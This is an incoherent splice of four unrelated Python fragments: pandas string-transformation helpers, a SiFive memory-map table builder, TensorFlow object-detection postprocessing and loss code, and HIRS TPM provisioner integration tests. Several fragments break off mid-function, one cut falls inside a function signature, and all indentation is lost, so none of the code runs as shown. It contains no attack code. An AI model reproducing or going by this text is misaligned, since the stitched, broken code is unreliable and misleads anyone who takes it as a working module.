doc = (
'Converts first character to uppercase and remaining '
'to lowercase for each word of each line of `column`.'
)
title = _generate_basic_str_postprocess('title', doc)
doc = 'Converts uppercase to lowercase and lowercase to uppercase for each word of `column`.'
swapcase = _generate_basic_str_postprocess('swapcase', doc)
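# A small, hypothetical usage sketch of the generated helpers above; the
# DataFrame contents and column names are illustrative only.
def _example_basic_postprocess():
    df = pd.DataFrame({'name': ['alice', 'BOB']})
    df = upper(df, 'name', new_column='name_upper')  # adds 'name_upper' column
    df = length(df, 'name')                          # overwrites 'name' with string lengths
    return df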
# isalnum, isalpha, isdigit, isspace, islower, isupper, istitle, isnumeric, isdecimal
###################################################################################################
doc = 'Check whether all characters in each string in `column` are alphanumeric'
isalnum = _generate_basic_str_postprocess('isalnum', doc)
doc = 'Check whether all characters in each string in `column` are alphabetic'
isalpha = _generate_basic_str_postprocess('isalpha', doc)
doc = 'Check whether all characters in each string in `column` are digits'
isdigit = _generate_basic_str_postprocess('isdigit', doc)
doc = 'Check whether all characters in each string in `column` are whitespace'
isspace = _generate_basic_str_postprocess('isspace', doc)
doc = 'Check whether all characters in each string in `column` are lowercase'
islower = _generate_basic_str_postprocess('islower', doc)
doc = 'Check whether all characters in each string in `column` are uppercase'
isupper = _generate_basic_str_postprocess('isupper', doc)
doc = 'Check whether all characters in each string in `column` are titlecase'
istitle = _generate_basic_str_postprocess('istitle', doc)
doc = 'Check whether all characters in each string in `column` are numeric'
isnumeric = _generate_basic_str_postprocess('isnumeric', doc)
doc = 'Check whether all characters in each string in `column` are decimal'
isdecimal = _generate_basic_str_postprocess('isdecimal', doc)
###################################################################################################
# STRIP METHODS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param to_strip: (str: None) set of characters to be removed
# :param new_column: the destination column (if not set, `column` will be used)
# :return: the transformed dataframe
###################################################################################################
def _generate_strip_str_postprocess(method_name, docstring):
def f(df, column: str, *, to_strip: str = None, new_column: str = None):
method = getattr(df[column].str, method_name)
new_column = new_column or column
df.loc[:, new_column] = method(to_strip)
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
*optional :*
- `to_strip` (*str*): set of characters to be removed
- `new_column` (*str*): the destination column (if not set, `column` will be used)
"""
return f
doc = 'Strip whitespace (including newlines) from each string in `column` from both sides'
strip = _generate_strip_str_postprocess('strip', doc)
doc = 'Strip whitespace (including newlines) from each string in `column` from left side'
lstrip = _generate_strip_str_postprocess('lstrip', doc)
doc = 'Strip whitespace (including newlines) from each string in `column` from right side'
rstrip = _generate_strip_str_postprocess('rstrip', doc)
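# Hypothetical example of `strip`: remove leading and trailing dots from a
# column (data and column name are illustrative only).
def _example_strip():
    df = pd.DataFrame({'code': ['..A1..', '.B2.']})
    return strip(df, 'code', to_strip='.')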
###################################################################################################
# METHODS with `width` and `fillchar`
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param width: (int) minimum width
# :param fillchar: (default: \' \') additional character for filling
# :param new_column: the destination column (if not set, `column` will be used)
# :return: the transformed dataframe
###################################################################################################
def _generate_width_str_postprocess(method_name, docstring):
def f(df, column: str, *, width: int, fillchar: str = ' ', new_column: str = None):
method = getattr(df[column].str, method_name)
new_column = new_column or column
df.loc[:, new_column] = method(width, fillchar=fillchar)
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
- `width` (*int*): minimum width
*optional :*
- `fillchar` (*str*): additional character for filling
- `new_column` (*str*): the destination column (if not set, `column` will be used)
"""
return f
doc = 'Filling left and right side of strings in `column` with an additional character'
center = _generate_width_str_postprocess('center', doc)
doc = 'Filling right side of strings in `column` with an additional character'
ljust = _generate_width_str_postprocess('ljust', doc)
doc = 'Filling left side of strings in `column` with an additional character'
rjust = _generate_width_str_postprocess('rjust', doc)
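# Hypothetical example of `rjust`: left-pad a column to width 5 with zeros
# (data and column name are illustrative only).
def _example_rjust():
    df = pd.DataFrame({'code': ['7', '42']})
    return rjust(df, 'code', width=5, fillchar='0')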
###################################################################################################
# SPLIT METHODS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param new_columns: the destination columns
# (if not set, columns `column_1`, ..., `column_n` will be created)
# :param sep: (default: \' \') string or regular expression to split on
# :param limit: (default: None) limit number of splits in output
# :return: the transformed dataframe
###################################################################################################
def _generate_split_str_postprocess(method_name, docstring):
def f(df, column: str, *, new_columns: List[str] = None, sep: str = ' ', limit: int = None):
method = getattr(df[column].str, method_name)
df_split = method(pat=sep, n=limit, expand=True)
nb_cols = df_split.shape[1]
if new_columns and (not isinstance(new_columns, list) or nb_cols > len(new_columns)):
raise ValueError(f"'new_columns' should be a list with at least {nb_cols} elements")
if new_columns is None:
new_columns = [f'{column}_{i}' for i in range(1, nb_cols + 1)]
df[new_columns[:nb_cols]] = df_split
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
*optional :*
- `sep` (*str*): string or regular expression to split on
- `limit` (*int*): limit number of splits in output (by default, there is no limit)
- `new_columns` (*list*): the destination columns (by default, new columns will be added automatically)
"""
return f
doc = 'Split each string in the caller’s values by given pattern, propagating NaN values'
split = _generate_split_str_postprocess('split', doc)
doc = (
'Split each string `column` by the given delimiter string, '
'starting at the end of the string and working to the front'
)
rsplit = _generate_split_str_postprocess('rsplit', doc)
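# Hypothetical example of `split`: break a 'full_name' column into two new
# columns (data and column names are illustrative only).
def _example_split():
    df = pd.DataFrame({'full_name': ['Ada Lovelace', 'Alan Turing']})
    return split(df, 'full_name', new_columns=['first', 'last'], sep=' ')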
###################################################################################################
# PARTITION METHODS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param new_columns: the 3 destination columns
# :param sep: (default: \' \') string or regular expression to split on
# :return: the transformed dataframe
###################################################################################################
def _generate_partition_str_postprocess(method_name, docstring):
def f(df, column: str, *, new_columns: List[str], sep: str = ' '):
if len(new_columns) != 3:
raise ValueError('`new_columns` must have 3 columns exactly')
method = getattr(df[column].str, method_name)
df[new_columns] = method(sep)
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
- `new_columns` (*list*): the 3 destination columns
*optional :*
- `sep` (*str*): string or regular expression to split on
"""
return f
doc = (
'Split the string at the first occurrence of sep, and return 3 elements containing '
'the part before the separator, the separator itself, and the part after the separator. '
'If the separator is not found, return 3 elements containing the string itself, '
'followed by two empty strings.'
)
partition = _generate_partition_str_postprocess('partition', doc)
doc = (
'Split the string at the last occurrence of sep, and return 3 elements containing '
'the part before the separator, the separator itself, and the part after the separator. '
'If the separator is not found, return 3 elements containing two empty strings, '
'followed by the string itself.'
)
rpartition = _generate_partition_str_postprocess('rpartition', doc)
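# Hypothetical example of `partition`: the three destination columns receive
# the text before the first separator, the separator itself, and the rest
# (data and column names are illustrative only).
def _example_partition():
    df = pd.DataFrame({'path': ['usr/local/bin']})
    return partition(df, 'path', new_columns=['head', 'sep', 'tail'], sep='/')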
###################################################################################################
# INDEX AND FIND METHODS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param new_column: the destination column (if not set, `column` will be used)
# :param sub: substring being searched
# :param start: (default: 0) left edge index
# :param end: (default: None) right edge index
# :return: the transformed dataframe
###################################################################################################
def _generate_find_str_postprocess(method_name,
# Copyright 2019 SiFive, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You should have received a copy of LICENSE.Apache2 along with
# this software. If not, you may obtain a copy at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#################################################################
#
# Classes and functions for working with memory maps.
# These routines are factored into three groups:
# - Representing and working with memory maps
# - Creating a displayable MemoryMapTable from memory maps
# - Building memory maps from ObjectModel design elements.
#
# This factoring allows the code to be reused for multiple purposes.
# For example, they can
# - Provide an overall memory map of a core complex.
# - Verify multiple TIMs are or are not contiguous.
# - Provide detailed memory maps of specific components.
# - Provide a deterministic ordering of devices (by base address ...)
#
#################################################################
import sys
from typing import Iterable, List, NamedTuple, TypeVar, Tuple
from scribble.model import Element, DocumentException, n_bytes, hex_addr, QueryStream
from scribble.template import human_size
import scribble.table as table
#################################################################
#
# The following classes define the elements of an AddressMap.
#
# We then define three instances of an AddressMap
# RangeMap - contains only the address ranges.
# RegionMap - adds permissions and a description for a range of memory (or memory mapped regs)
# SectionMap - only adds a note.
#
# The basic idea is to abstract out the address range handling.
# If additional information is needed, extra fields can be added to a subtype of AddressRange.
#
################################################################
class AddressRange(NamedTuple):
base: int
size: int
@property
def top(self) -> int:
"""Inclusive upper bound of the address range (base + size - 1)."""
return self.base + self.size - 1
# Specialize the Address Range to include permissions and a description.
# Used by scribble to describe each address range in detail.
class MemoryRange(NamedTuple, AddressRange):
base: int
size: int
description: str
readable: bool
writeable: bool
executable: bool
cacheable: bool
atomics: bool
@property
def top(self):
return self.base + self.size - 1
# Specialize the Address Map to contain a note describing the address range.
# This is used by scribble to give a general overview of the addresses.
class SectionRange(NamedTuple, AddressRange):
base: int
size: int
notes: str
@property
def top(self):
return self.base + self.size - 1
# Type variable representing a sub-type of AddressRange
R = TypeVar("R", bound=AddressRange)
class AddressMap(List[R]):
"""
Creates an address map from a collection of address range elements.
"""
def __init__(self, ranges: Iterable[R]):
# Sort the ranges by base address.
sorted_ranges = sorted(ranges, key=lambda region: region.base)
super().__init__(sorted_ranges)
# Verify we have no overlapping regions.
self.assert_no_overlapping_ranges()
def is_contiguous(self) -> bool:
regions = self
for i in range(1, len(regions)):
if regions[i - 1].top + 1 != regions[i].base:
return False
return True
@property
def address_range(self) -> AddressRange:
if self.is_empty():
return AddressRange(0, 0)
else:
return AddressRange(self[0].base, self[-1].top)
def total_size(self) -> int:
return sum(region.size for region in self)
def is_empty(self) -> bool:
return not self
def assert_no_overlapping_ranges(self):
"""
Verify that none of the regions in this map overlap.
"""
regions = self
for i in range(1, len(regions)):
if regions[i - 1].top >= regions[i].base:
raise DocumentException(
f"Memory Regions {regions[i-1]} and " f"{regions[i]} overlap"
)
# Specialize the maps based on the subtypes of AddressRange.
RegionMap = AddressMap[MemoryRange]
SectionMap = AddressMap[SectionRange]
# Type variables representing sub-types of AddressRange.
R1 = TypeVar("R1", bound=AddressRange)
R2 = TypeVar("R2", bound=AddressRange)
def correlate_maps(
smaller: AddressMap[R1], bigger: AddressMap[R2]
) -> Iterable[Tuple[List[R1], R2]]:
"""
Correlate the regions of one map within the regions of the second map.
Raise error if any of the former don't fit entirely within the second.
"""
# Start with the first of the smaller regions.
small_iter = iter(smaller)
small = next(small_iter, None)
# For each of the big regions
for big in bigger:
# Accumulate group of smaller regions which fit inside the big region
group = []
while small is not None and small.top <= big.top and small.base >= big.base:
group.append(small)
small = next(small_iter, None)
# Yield the group of small regions which fit within the big region.
yield (group, big)
# If we reach the end and still have smaller regions, then the smaller region didn't fit.
if small is not None:
raise DocumentException(f"correlate_maps: Address Range {small} doesn't fit into section")
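# A small, hypothetical illustration of correlate_maps: two detailed regions
# grouped under a single overview section (all addresses are made up).
def _example_correlate_maps():
    small = AddressMap([AddressRange(0x1000, 0x100), AddressRange(0x1100, 0x100)])
    big = AddressMap([AddressRange(0x1000, 0x1000)])
    # expected: [([AddressRange(0x1000, 0x100), AddressRange(0x1100, 0x100)],
    #             AddressRange(0x1000, 0x1000))]
    return list(correlate_maps(small, big))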
###############################################################################
#
# Routines for creating a displayable MemorySectionTable from memory map data structures.
#
################################################################################
class MemorySectionTable(table.Table):
def __init__(self, title: str, regions: RegionMap, reference_id: str, sections: SectionMap):
"""
Construct a memory map table based on a detailed memory map and a section overview map.
:param title: The title of the table.
:param regions: detailed memory mapped regions
:param reference_id: reference id of the table.
:param sections: overview sections for summarizing the detailed regions.
:return: a displayable asciidoc table.
"""
# If a single overview section with no notes, then don't show notes column.
show_notes = len(sections) > 1 or sections[0].notes
header = [
table.HeaderCell("Base", halign=table.HAlign.RIGHT, style=table.Style.MONOSPACED),
table.HeaderCell("Top", halign=table.HAlign.RIGHT, style=table.Style.MONOSPACED),
table.HeaderCell("Attr.", style=table.Style.MONOSPACED),
table.HeaderCell("Description"),
] + ([table.HeaderCell("Notes")] if show_notes else [])
# Group the memory regions by corresponding sections.
regions_by_section = correlate_maps(regions, sections)
regions_by_section = list(regions_by_section)
# For each section, format a set memory map rows.
padding = n_bytes(sections[-1].top) # How many bytes to display in addresses.
rows = [
row
for regs, section in regions_by_section
for row in _get_table_rows_for_section(section, regs, show_notes, padding)
]
super().__init__(
title=title, reference_id=reference_id, header=header, autowidth=True, rows=rows
)
def _get_table_rows_for_section(
section: SectionRange, regions: List[MemoryRange], show_notes: bool, padding: int
) -> Iterable[table.Row]:
"""
Return Row objects for each section.
The last column spans all rows within the section, so the first row
will have an additional column.
"""
# get list of strings for each table row.
rows = list(get_region_rows(regions, section.base, section.top, padding))
# Add a note to first row which spans all the rows in this section.
if show_notes:
rows[0].append(
table.Cell(contents=section.notes, row_span=len(rows), valign=table.VAlign.MIDDLE)
)
return map(table.Row, rows)
def get_region_rows(
regions: List[MemoryRange], base: int, top: int, padding: int
) -> Iterable[List[str]]:
"""
Generate a sequence of memory table rows, spanning from base to top. Fill gaps with "Reserved".
"""
# for each region in the section
for region in regions:
# if there is a gap, create a reserved row.
if base < region.base:
yield [hex_addr(base, padding), hex_addr(region.base - 1, padding), "", "Reserved"]
# create a row for the region
yield [
hex_addr(region.base, padding),
hex_addr(region.top, padding),
format_permission(region),
region.description,
]
# Move to the next region.
base = region.top + 1
# If there is a gap at the end, another reserved region.
if base <= top:
yield [hex_addr(base, padding), hex_addr(top, padding), "", "Reserved"]
def format_permission(region: MemoryRange) -> str:
NBSP = " "
return "".join(
[
"R" if region.readable else NBSP,
"W" if region.writeable else NBSP,
"X" if region.executable else NBSP,
"C" if region.cacheable else NBSP,
"A" if region.atomics else NBSP,
]
)
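# For example, a region with readable, writeable and cacheable set (and the
# rest unset) would render as "RW C " with non-breaking spaces in the unused
# X and A positions.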
###########################################################################
#
# Routines to build memory maps (and tables) from Object Model design elements.
#
##############################################################################
class MemoryTable(MemorySectionTable):
"""
Given a group of design elements, construct a memory map table from their memory ranges.
"""
def __init__(
self, title: str, elements: Iterable[Element], reference_id: str, sections: Element = None
):
regions = MemoryMap(*elements)
sectionMap = get_section_map(sections, regions)
super().__init__(title, regions, reference_id, sectionMap)
class MemoryMap(RegionMap):
"""
Build a map of all the memory regions contained in a set of elements.
"""
def __init__(self, *elements: Element):
# Get all the memory regions for the elements and create a Memory map.
regions = [
region
for element in elements
for device in element.query().contains_key("memoryRegions")
for region in getRegions(device)
]
super().__init__(regions)
def getRegions(e: Element) -> Iterable[MemoryRange]:
"""
Given a design element, get the memory regions corresponding to the element.
"""
# For each of the element's memory regions
for region in e.memoryRegions:
# For each contiguous range of the region
for range in getRanges(region):
# Get a description of the memory region.
# If a single region, give priority to the element's name.
# TODO: Let's
feature_maps
"""
feature_map_shapes = [
shape_utils.combined_static_and_dynamic_shape(
feature_map) for feature_map in feature_maps
]
return [(shape[1], shape[2]) for shape in feature_map_shapes]
def postprocess(self, prediction_dict):
"""Converts prediction tensors to final detections.
This function converts raw predictions tensors to final detection results by
slicing off the background class, decoding box predictions and applying
non max suppression and clipping to the image window.
See base class for output format conventions. Note also that by default,
scores are to be interpreted as logits, but if a score_conversion_fn is
used, then scores are remapped (and may thus have a different
interpretation).
Args:
prediction_dict: a dictionary holding prediction tensors with
1) box_encodings: 3-D float tensor of shape [batch_size, num_anchors,
box_code_dimension] containing predicted boxes.
2) class_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, num_classes+1] containing class predictions
(logits) for each of the anchors. Note that this tensor *includes*
background class predictions.
Returns:
detections: a dictionary containing the following fields
detection_boxes: [batch, max_detections, 4]
detection_scores: [batch, max_detections]
detection_classes: [batch, max_detections]
detection_keypoints: [batch, max_detections, num_keypoints, 2] (if
encoded in the prediction_dict 'box_encodings')
num_detections: [batch]
Raises:
ValueError: if prediction_dict does not contain `box_encodings` or
`class_predictions_with_background` fields.
"""
if ('box_encodings' not in prediction_dict or
'class_predictions_with_background' not in prediction_dict):
raise ValueError('prediction_dict does not contain expected entries.')
with tf.name_scope('Postprocessor'):
box_encodings = prediction_dict['box_encodings']
class_predictions = prediction_dict['class_predictions_with_background']
detection_boxes, detection_keypoints = self._batch_decode(box_encodings)
detection_boxes = tf.expand_dims(detection_boxes, axis=2)
class_predictions_without_background = tf.slice(class_predictions,
[0, 0, 1],
[-1, -1, -1])
detection_scores = self._score_conversion_fn(
class_predictions_without_background)
clip_window = tf.constant([0, 0, 1, 1], tf.float32)
additional_fields = None
if detection_keypoints is not None:
additional_fields = {
fields.BoxListFields.keypoints: detection_keypoints}
(nmsed_boxes, nmsed_scores, nmsed_classes, _, nmsed_additional_fields,
num_detections) = self._non_max_suppression_fn(
detection_boxes,
detection_scores,
clip_window=clip_window,
additional_fields=additional_fields)
detection_dict = {'detection_boxes': nmsed_boxes,
'detection_scores': nmsed_scores,
'detection_classes': nmsed_classes,
'num_detections': tf.to_float(num_detections)}
if (nmsed_additional_fields is not None and
fields.BoxListFields.keypoints in nmsed_additional_fields):
detection_dict['detection_keypoints'] = nmsed_additional_fields[
fields.BoxListFields.keypoints]
return detection_dict
def loss(self, prediction_dict, scope=None):
"""Compute scalar loss tensors with respect to provided groundtruth.
Calling this function requires that groundtruth tensors have been
provided via the provide_groundtruth function.
Args:
prediction_dict: a dictionary holding prediction tensors with
1) box_encodings: 3-D float tensor of shape [batch_size, num_anchors,
box_code_dimension] containing predicted boxes.
2) class_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, num_classes+1] containing class predictions
(logits) for each of the anchors. Note that this tensor *includes*
background class predictions.
scope: Optional scope name.
Returns:
a dictionary mapping loss keys (`localization_loss` and
`classification_loss`) to scalar tensors representing corresponding loss
values.
"""
with tf.name_scope(scope, 'Loss', prediction_dict.values()):
keypoints = None
if self.groundtruth_has_field(fields.BoxListFields.keypoints):
keypoints = self.groundtruth_lists(fields.BoxListFields.keypoints)
(batch_cls_targets, batch_cls_weights, batch_reg_targets,
batch_reg_weights, match_list) = self._assign_targets(
self.groundtruth_lists(fields.BoxListFields.boxes),
self.groundtruth_lists(fields.BoxListFields.classes),
keypoints)
if self._add_summaries:
self._summarize_input(
self.groundtruth_lists(fields.BoxListFields.boxes), match_list)
num_matches = tf.stack(
[match.num_matched_columns() for match in match_list])
location_losses = self._localization_loss(
prediction_dict['box_encodings'],
batch_reg_targets,
ignore_nan_targets=True,
weights=batch_reg_weights)
# print('skye location_losses=', location_losses)
# print('skye location_losses.shape=', location_losses.shape)
cls_losses = self._classification_loss(
prediction_dict['class_predictions_with_background'],
batch_cls_targets,
weights=batch_cls_weights)
if self._hard_example_miner:
(localization_loss, classification_loss) = self._apply_hard_mining(
location_losses, cls_losses, prediction_dict, match_list)
if self._add_summaries:
self._hard_example_miner.summarize()
else:
if self._add_summaries:
class_ids = tf.argmax(batch_cls_targets, axis=2)
flattened_class_ids = tf.reshape(class_ids, [-1])
flattened_classification_losses = tf.reshape(cls_losses, [-1])
self._summarize_anchor_classification_loss(
flattened_class_ids, flattened_classification_losses)
localization_loss = tf.reduce_sum(location_losses)
classification_loss = tf.reduce_sum(cls_losses)
# Optionally normalize by number of positive matches
normalizer = tf.constant(1.0, dtype=tf.float32)
if self._normalize_loss_by_num_matches:
normalizer = tf.maximum(tf.to_float(tf.reduce_sum(num_matches)), 1.0)
with tf.name_scope('localization_loss'):
localization_loss = ((self._localization_loss_weight / normalizer) *
localization_loss)
with tf.name_scope('classification_loss'):
classification_loss = ((self._classification_loss_weight / normalizer) *
classification_loss)
loss_dict = {
'localization_loss': localization_loss,
'classification_loss': classification_loss
}
return loss_dict
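# Editorial summary of the code above (hedged; the anchorwise losses are
# whatever was injected via self._localization_loss / self._classification_loss):
#   localization_loss   = (localization_weight / N) * sum of anchorwise location losses
#   classification_loss = (classification_weight / N) * sum of anchorwise classification losses
# where N = max(total matched anchors, 1) when _normalize_loss_by_num_matches
# is set and 1 otherwise; hard-example mining, if configured, restricts the
# sums to the mined anchors.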
def _summarize_anchor_classification_loss(self, class_ids, cls_losses):
positive_indices = tf.where(tf.greater(class_ids, 0))
positive_anchor_cls_loss = tf.squeeze(
tf.gather(cls_losses, positive_indices), axis=1)
visualization_utils.add_cdf_image_summary(positive_anchor_cls_loss,
'PositiveAnchorLossCDF')
negative_indices = tf.where(tf.equal(class_ids, 0))
negative_anchor_cls_loss = tf.squeeze(
tf.gather(cls_losses, negative_indices), axis=1)
visualization_utils.add_cdf_image_summary(negative_anchor_cls_loss,
'NegativeAnchorLossCDF')
def _assign_targets(self, groundtruth_boxes_list, groundtruth_classes_list,
groundtruth_keypoints_list=None):
"""Assign groundtruth targets.
Adds a background class to each one-hot encoding of groundtruth classes
and uses target assigner to obtain regression and classification targets.
Args:
groundtruth_boxes_list: a list of 2-D tensors of shape [num_boxes, 4]
containing coordinates of the groundtruth boxes.
Groundtruth boxes are provided in [y_min, x_min, y_max, x_max]
format and assumed to be normalized and clipped
relative to the image window with y_min <= y_max and x_min <= x_max.
groundtruth_classes_list: a list of 2-D one-hot (or k-hot) tensors of
shape [num_boxes, num_classes] containing the class targets with the 0th
index assumed to map to the first non-background class.
groundtruth_keypoints_list: (optional) a list of 3-D tensors of shape
[num_boxes, num_keypoints, 2]
Returns:
batch_cls_targets: a tensor with shape [batch_size, num_anchors,
num_classes],
batch_cls_weights: a tensor with shape [batch_size, num_anchors],
batch_reg_targets: a tensor with shape [batch_size, num_anchors,
box_code_dimension]
batch_reg_weights: a tensor with shape [batch_size, num_anchors],
match_list: a list of matcher.Match objects encoding the match between
anchors and groundtruth boxes for each image of the batch,
with rows of the Match objects corresponding to groundtruth boxes
and columns corresponding to anchors.
"""
groundtruth_boxlists = [
box_list.BoxList(boxes) for boxes in groundtruth_boxes_list
]
groundtruth_classes_with_background_list = [
tf.pad(one_hot_encoding, [[0, 0], [1, 0]], mode='CONSTANT')
for one_hot_encoding in groundtruth_classes_list
]
if groundtruth_keypoints_list is not None:
for boxlist, keypoints in zip(
groundtruth_boxlists, groundtruth_keypoints_list):
boxlist.add_field(fields.BoxListFields.keypoints, keypoints)
return target_assigner.batch_assign_targets(
self._target_assigner, self.anchors, groundtruth_boxlists,
groundtruth_classes_with_background_list)
def _summarize_input(self, groundtruth_boxes_list, match_list):
"""Creates tensorflow summaries for the input boxes and anchors.
This function creates four summaries corresponding to the average
number (over images in a batch) of (1) groundtruth boxes, (2) anchors
marked as positive, (3) anchors marked as negative, and (4) anchors marked
as ignored.
Args:
groundtruth_boxes_list: a list of 2-D tensors of shape [num_boxes, 4]
containing corners of the groundtruth boxes.
match_list: a list of matcher.Match objects encoding the match between
anchors and groundtruth boxes for each image of the batch,
with rows of the Match objects corresponding to groundtruth boxes
and columns corresponding to anchors.
"""
num_boxes_per_image = tf.stack(
[tf.shape(x)[0] for x in groundtruth_boxes_list])
pos_anchors_per_image = tf.stack(
[match.num_matched_columns() for match in match_list])
neg_anchors_per_image = tf.stack(
[match.num_unmatched_columns() for match in match_list])
ignored_anchors_per_image = tf.stack(
[match.num_ignored_columns() for match in match_list])
tf.summary.scalar('Input/AvgNumGroundtruthBoxesPerImage',
tf.reduce_mean(tf.to_float(num_boxes_per_image)))
tf.summary.scalar('Input/AvgNumPositiveAnchorsPerImage',
tf.reduce_mean(tf.to_float(pos_anchors_per_image)))
tf.summary.scalar('Input/AvgNumNegativeAnchorsPerImage',
tf.reduce_mean(tf.to_float(neg_anchors_per_image)))
tf.summary.scalar('Input/AvgNumIgnoredAnchorsPerImage',
tf.reduce_mean(tf.to_float(ignored_anchors_per_image)))
def _apply_hard_mining(self, location_losses, cls_losses, prediction_dict,
match_list):
"""Applies hard mining to anchorwise losses.
Args:
location_losses: Float tensor of shape [batch_size, num_anchors]
representing anchorwise location losses.
cls_losses: Float tensor of shape [batch_size, num_anchors]
representing anchorwise classification losses.
prediction_dict: a dictionary holding prediction tensors with
1) box_encodings: 3-D float tensor of shape [batch_size, num_anchors,
box_code_dimension] containing predicted boxes.
2) class_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, num_classes+1] containing class predictions
(logits) for each of the anchors. Note that this tensor *includes*
background class predictions.
match_list: a list of matcher.Match objects encoding the match between
anchors and groundtruth boxes for each image of the batch,
with rows of the Match objects corresponding to groundtruth boxes
and columns corresponding to anchors.
Returns:
mined_location_loss: a float scalar with sum of localization losses from
selected hard examples.
mined_cls_loss: a float scalar with sum of classification losses from
selected hard examples.
"""
class_predictions = tf.slice(
prediction_dict['class_predictions_with_background'], [0, 0,
1], [-1, -1, -1])
decoded_boxes, _ = self._batch_decode(prediction_dict['box_encodings'])
decoded_box_tensors_list = tf.unstack(decoded_boxes)
class_prediction_list = tf.unstack(class_predictions)
decoded_boxlist_list = []
for box_location, box_score in zip(decoded_box_tensors_list,
class_prediction_list):
decoded_boxlist = box_list.BoxList(box_location)
decoded_boxlist.add_field('scores', box_score)
decoded_boxlist_list.append(decoded_boxlist)
return self._hard_example_miner(
location_losses=location_losses,
cls_losses=cls_losses,
decoded_boxlist_list=decoded_boxlist_list,
match_list=match_list)
def _batch_decode(self, box_encodings):
"""Decodes a batch of box encodings with respect to the anchors.
Args:
box_encodings: A float32 tensor of shape
[batch_size, num_anchors, box_code_size] containing box encodings.
Returns:
decoded_boxes: A float32 tensor of shape
[batch_size, num_anchors, 4] containing the decoded boxes.
decoded_keypoints: A float32 tensor of shape
[batch_size, num_anchors, num_keypoints, 2] containing the decoded
keypoints if present in the input `box_encodings`, None otherwise.
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(
box_encodings)
batch_size = combined_shape[0]
tiled_anchor_boxes = tf.tile(
tf.expand_dims(self.anchors.get(), 0), [batch_size, 1, 1])
tiled_anchors_boxlist = box_list.BoxList(
tf.reshape(tiled_anchor_boxes, [-1, 4]))
decoded_boxes = self._box_coder.decode(
tf.reshape(box_encodings, [-1, self._box_coder.code_size]),
tiled_anchors_boxlist)
decoded_keypoints = None
if decoded_boxes.has_field(fields.BoxListFields.keypoints):
decoded_keypoints = decoded_boxes.get_field(
fields.BoxListFields.keypoints)
num_keypoints = decoded_keypoints.get_shape()[1]
decoded_keypoints = tf.reshape(
decoded_keypoints,
tf.stack([combined_shape[0], combined_shape[1], num_keypoints, 2]))
decoded_boxes = tf.reshape(decoded_boxes.get(), tf.stack(
[combined_shape[0], combined_shape[1], 4]))
return decoded_boxes, decoded_keypoints
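# Shape walk-through of _batch_decode (editorial, inferred from the code):
#   box_encodings [B, A, code_size] -> reshaped to [B*A, code_size];
#   anchors tiled to [B*A, 4] and wrapped in a BoxList for decoding;
#   decoded boxes reshaped back to [B, A, 4] (keypoints handled analogously).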
def restore_map(self, from_detection_checkpoint=True):
"""Returns a map of variables to load from a foreign checkpoint.
See parent class for details.
Args:
from_detection_checkpoint: whether to restore from a full detection
checkpoint (with compatible variable names) or to restore from a
classification checkpoint for initialization prior to training.
Returns:
A dict mapping variable names
HIRS report and ensure it passes
- Ensure that there are no new alerts
"""
logging.info("***************** Beginning of broad repo successful appraisal test *****************")
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_1_2(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_13_tpm_1_2_initial_provision(self):
"""Test that running the TPM 1.2 hirs provisioner works"""
logging.info("***************** Beginning of initial TPM 1.2 provisioner run *****************")
# Run the provisioner to ensure that it provisions successfully
provisioner_out = run_hirs_provisioner_tpm_1_2(CLIENT)
print("Initial TPM 1.2 provisioner run output: {0}".format(provisioner_out))
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_14_tpm_2_0_initial_provision(self):
"""Test that running the TPM 2.0 hirs provisioner works"""
logging.info("***************** Beginning of initial TPM 2.0 provisioner run *****************")
# Run the provisioner to ensure that it provisions successfully
provisioner_out = run_hirs_provisioner_tpm2(CLIENT)
print("Initial provisioner run output: {0}".format(provisioner_out))
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_15_device_info_report_stored_after_provisioning(self):
"""Test that running the hirs provisioner results in storing a device info report for
the device in the DB"""
logging.info("***************** Beginning of device info report test *****************")
logging.info("Getting devices from ACA portal...")
aca_portal_devices = AcaPortal.get_devices()
self.assertEqual(aca_portal_devices['recordsTotal'], 1)
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_16_supply_chain_validation_summary_stored_after_second_provisioning(self):
"""Test that running the hirs provisioner, a second time, results in storing a supply chain validation
record in the database"""
logging.info("***************** Beginning of supply chain validation summary test *****************")
